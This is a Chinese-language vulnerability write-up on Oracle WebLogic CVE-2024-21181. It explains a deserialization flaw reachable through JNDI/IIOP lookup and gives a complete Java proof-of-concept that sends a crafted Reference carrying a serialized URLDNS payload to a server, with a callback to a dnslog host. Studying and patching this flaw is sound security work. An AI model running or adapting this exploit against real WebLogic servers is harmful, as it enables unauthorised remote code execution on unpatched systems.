一、漏洞原理分析
最近看到oracle7月补丁发布了weblogic 9.8分的漏洞CVE-2024-21181补丁,该漏洞危害较大,不像JNDI注入,服务器不出网也能利用,但是互联网上没有分析的文章,好久没研究weblogic就简单分析一下。weblogic采用白名单修复T3/IIOP反序列化漏洞,应该不会别绕过,学习了师傅的文章(CVE-2024-21006 Weblogic 远程代码执行挖掘思路)
https://xz.aliyun.com/t/14305?time__1311=GqAxuD9QiQdYqGNDQ0PBKvTzCqi%3DDgD8aoD
可以寻找ObjectFactory类的getObjectInstance方法来找漏洞利用点。
二、寻找漏洞利用点
发现weblogic.management.mbeanservers.partition.PartitionedMbsRefObjFactory类的getObjectInstance方法存在问题。
跟进,deserialize方法,跟进后发现反序列化漏洞
调用栈如下:
三、关键是如何编写POC
漏洞能够利用的关键是如何通过context.lookup(name)触发服务器执行getObjectInstance方法,同时传递payload,
核心要点是创建Reference,其实在PartitionedMbsRefObjFactory类里面已经教我们如何创建一个Reference。
代码如下:
StringRefAddr addr = new StringRefAddr("partitionName", "test");
Reference reference = new Reference(MBeanServer.class.getName(), addr, PartitionedDomainRuntimeMbsRefObjFactory.class.getName(), (String)null);
RefAddr jvmIdAddr = new BinaryRefAddr("jvmId", payload);
reference.add(jvmIdAddr);
return reference;
创建Reference的时候将加入字节BinaryRefAddr,插入序列化后的payload即可。
详细的POC如下
package org.example;
import weblogic.management.mbeanservers.partition.PartitionedDomainRuntimeMbsRefObjFactory;
import weblogic.management.mbeanservers.partition.PartitionedMbsRefObjFactory;
import javax.management.MBeanServer;
import javax.naming.*;
import java.lang.reflect.Method;
import java.util.Hashtable;
public class VulTest {
private static byte[] getPayload(String url) throws Exception{
PartitionedMbsRefObjFactory obj=new PartitionedDomainRuntimeMbsRefObjFactory();
Method serializeMethod= PartitionedMbsRefObjFactory.class.getDeclaredMethod("serialize",Object.class);
serializeMethod.setAccessible(true);
Object o=new URLDNS().getObject(url);
byte[] content=(byte[]) serializeMethod.invoke(obj,o);
Method deserializeMethod= PartitionedMbsRefObjFactory.class.getDeclaredMethod("deserialize",byte[].class);
deserializeMethod.setAccessible(true);
return content;
}
private static Reference createReference(byte[] payload) {
StringRefAddr addr = new StringRefAddr("partitionName", "test");
Reference reference = new Reference(MBeanServer.class.getName(), addr, PartitionedDomainRuntimeMbsRefObjFactory.class.getName(), (String)null);
RefAddr jvmIdAddr = new BinaryRefAddr("jvmId", payload);
reference.add(jvmIdAddr);
return reference;
}
public static void main(String[] args) throws Exception{
String ip = "127.0.0.1";
String port = "7001";
String rhost = String.format("iiop://%s:%s", ip, port);
Hashtable<String, String> env = new Hashtable<String, String>();
env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
env.put(Context.PROVIDER_URL, rhost);
Context context = new InitialContext(env);
String url="http://5d6xyy.dnslog.cn";
byte[] payload=getPayload(url);
String name="test";
Reference reference=createReference(payload);
context.rebind(name,reference);
context.lookup(name);
}
}漏洞调用站如下:
getObjectInstance:46, PartitionedMbsRefObjFactory (weblogic.management.mbeanservers.partition)
getObjectInstance:331, NamingManager (javax.naming.spi)
lookup:308, WLEventContextImpl (weblogic.jndi.internal)
lookup:435, WLContextImpl (weblogic.jndi.internal)
lookup:417, InitialContext (javax.naming)
resolveObject:460, NamingContextImpl (weblogic.corba.cos.naming)
resolve_any:367, NamingContextImpl (weblogic.corba.cos.naming)
_invoke:114, _NamingContextAnyImplBase (weblogic.corba.cos.naming)
invoke:249, CorbaServerRef (weblogic.corba.idl)
invoke:246, ClusterableServerRef (weblogic.rmi.cluster)
run:534, BasicServerRef$2 (weblogic.rmi.internal)
doAs:386, AuthenticatedSubject (weblogic.security.acl.internal)
runAs:163, SecurityManager (weblogic.security.service)
handleRequest:531, BasicServerRef (weblogic.rmi.internal)
run:138, WLSExecuteRequest (weblogic.rmi.internal.wls)
_runAs:352, ComponentInvocationContextManager (weblogic.invocation)
runAs:337, ComponentInvocationContextManager (weblogic.invocation)
doRunWorkUnderContext:57, LivePartitionUtility (weblogic.work)
runWorkUnderContext:41, PartitionUtility (weblogic.work)
runWorkUnderContext:655, SelfTuningWorkManagerImpl (weblogic.work)
execute:420, ExecuteThread (weblogic.work)
run:360, ExecuteThread (weblogic.work)查看7月最新的补丁,已经做了反序列化验证
转载
分享
发布投稿
